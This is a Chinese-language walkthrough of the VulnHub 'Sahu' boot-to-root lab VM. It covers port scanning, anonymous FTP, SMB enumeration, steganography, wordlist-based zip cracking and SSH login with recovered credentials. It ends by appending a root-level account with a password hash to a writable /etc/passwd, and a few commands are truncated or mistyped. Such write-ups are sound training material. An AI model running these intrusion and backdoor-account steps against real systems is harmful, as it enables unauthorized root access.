靶机描述
Sahu is a Virtualbox VM Built on Ubuntu 64 bit , The Goal Of this Machine is to get root And Read the root.txt file with Some Good Enumeration Skills
Difficulty : Beginner
Goal : Boot To Root
## Changelog: v1.1 - 2020-03-04 v1.0 - 2020-02-01
下载 https://www.vulnhub.com/entry/sahu-11,421/
清单
-
信息搜集
- netdiscover
- nmap
- enum4linux
- crunch
- fcrackzip
-
提权
- 可写入 /etcpasswd
信息搜集
靶机IP
端口扫描
nmap -A -p- 192.168.217.175
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 230 Jan 30 2020 ftp.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.217.168
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:78:c5:73:f2:86:cb:cb:02:7f:b6:72:85:61:ac:91 (RSA)
| 256 22:1a:ee:1a:98:4f:32:e7:dc:30:43:52:2c:b2:24:06 (ECDSA)
|_ 256 1a:9b:28:b3:ad:58:32:e9:6c:f3:ea:3b:cf:6b:08:ad (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open netbios-ssn Samba smbd 4.10.7-Ubuntu (workgroup: SAHU)
开放 21、22、80、139、445
21 可以匿名登陆
得到一个压缩包,但是没有密码
80 端口 一张图片
139、445
enum4linux
使用 enum4linux 来对主机搜集信息
得到 sahu 用户
同样需要密码
目录扫描
dirb http://192.168.217.175/ /usr/share/wordlists/dirb/big.txt
当扫描目录时发现,出现 /H/A ,像是网页中的 haryana
补全访问网页
view-source:http://192.168.217.175/H/A/R/Y/A/N/A/
在末尾发现了 extract with hurry
将主页的图片下载下来
提取得到信息 1
steghide extract -sf Haryana-1-1.jpg -p hurrry
I have found the password for a zip file but i have forgote the last part of it, can you find out
现在,根据提示给出来生成字典
字典生成 crunch
crunch 2
使用生成的字典 zippasswd01 来破解zip
fcrackzip -D -u -p zippasswd01 ftp.zip
得到密码 5AHU#5
解压压缩包
得到 ftp 用户密码
sahu
sahu14216
登陆 smb
smbclient //192.168.217.175/sambashare -U sahu
获得 ssh 账户、密码
提权
登陆之后发现 /etc/passwd 是可以写入的3
现在来写入一个新的用户
echo "yutian:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash: >> /etc/passwd
# 密码为 Password@973
切换用户 得到 root